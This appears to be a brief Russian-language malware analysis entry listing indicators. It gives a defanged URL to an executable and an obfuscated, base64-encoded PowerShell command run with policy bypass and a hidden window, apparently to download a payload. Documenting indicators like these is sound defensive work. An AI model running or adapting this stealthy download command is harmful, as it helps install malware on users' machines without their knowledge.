Техническая информация
- http://dh##mhn.com/sunday/buks.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " pOwErsheLL.eXe -Ex ByPaSS -Nop -w HiDdEn -EC IAAMAAkAcwBFAFQALQBDAG8AbgB0AGUATgBUACAADAAgAC0AVgBhACAACwAgACgACQAJAAkATgBlAFcALQBvAEIASgBFAEMAVAAJAAwACQBTAFkAUwBUAEUATQAuAG4AZQBUAC4A...' (со скрытым окном)